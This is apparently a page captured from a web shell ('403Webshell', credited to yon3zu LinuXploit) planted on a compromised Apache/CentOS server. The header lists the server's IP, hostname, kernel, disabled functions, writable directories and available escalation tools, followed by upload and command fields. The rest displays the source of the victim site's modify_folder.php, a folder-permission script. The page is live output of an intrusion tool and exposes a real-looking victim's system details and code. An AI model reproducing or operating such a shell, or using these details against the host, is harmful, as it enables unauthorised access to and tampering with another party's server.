403Webshell
Server IP : 210.245.233.93  /  Your IP : 216.73.216.226
Web Server : Apache/2.2.15 (CentOS)
System : Linux webserver2.onesolution.com.hk 2.6.32-754.35.1.el6.x86_64 #1 SMP Sat Nov 7 12:42:14 UTC 2020 x86_64
User : apache ( 48)
PHP Version : 5.3.3
Disable Function : exec, shell_exec, system, passthru, popen, proc_open, pcntl_exec
MySQL : ON  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : ON  |  Sudo : ON  |  Pkexec : ON
Directory :  /var/www/hkosl.com/e-ims/file_manager/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /var/www/hkosl.com/e-ims/file_manager//modify_folder.php
<?php
include 'config.php';

// Check if the user is logged in

if ((!isSet($_SESSION['loginname'])) || ($loggin <> '1'))
{
header("Location: login.php");
exit;
}

$index			= $_POST["index"];
$companyid		= $_POST["companyid"];
$parentid		= $_POST["parentid"];
$levelnum		= $_POST["levelnum"];
$folderid		= $_POST["folderid"];
$title 			= htmlspecialchars($_POST["title"],ENT_QUOTES);
$nowdate 		= date("Y-m-d H:i:s");
//print_r($_POST); 

//ADD Permission
$roleid			= $_POST["roleid"];
$read			= $_POST["read"];
$write			= $_POST["write"];
$sql = "delete from file_folder_permission where folderid=:folderid";
$sql_param = array();
$sql_param[':folderid'] = $folderid;
$sth = Db::getDbh()->prepare($sql);
$sth->execute($sql_param);
if( $error = $sth->getError($sql_param) ){
	var_dump($error);
}
foreach ($roleid as $x => $v)	{
	$troleid = $roleid[$x];
	$tread = $read[$x];
	$twrite = $write[$x];
	if($tread || $twrite){
		$sql = "insert into file_folder_permission (folderid, companyid, roleid, p_read, p_write, createby, createdate) VALUES(:folderid, :companyid, :roleid, :p_read, :p_write, :createby, :createdate)";
		$sth = Db::getDbh()->prepare($sql);
		$sql_param = array();
		$sql_param[':folderid'] = $folderid;
		$sql_param[':companyid'] = $companyid;
		$sql_param[':roleid'] = $troleid;
		$sql_param[':p_read'] = $tread;
		$sql_param[':p_write'] = $twrite;
		$sql_param[':createby'] = $_SESSION['loginid'];
		$sql_param[':createdate'] = $nowdate;
		$sth->execute($sql_param);
		if( $error = $sth->getError($sql_param) ){
			var_dump($error);
		}
	}
}

$sql = "update file_folder set companyid=:companyid, title=:title, lastupdate=:lastupdate, lastupby=:lastupby where folderid=:folderid";
$sth = Db::getDbh()->prepare($sql);
$sql_param = array();
$sql_param[':companyid'] = $companyid;
$sql_param[':title'] = $title;
$sql_param[':lastupby'] = $_SESSION['loginid'];
$sql_param[':lastupdate'] = $nowdate;
$sql_param[':folderid'] = $folderid;
$sth->execute($sql_param);
if( $error = $sth->getError($sql_param) ){
	var_dump($error);
}

$dbh = null;

header("Location: index.php?index=$index&companyid=$companyid&pid=$parentid");

?>

Youez - 2016 - github.com/yon3zu
LinuXploit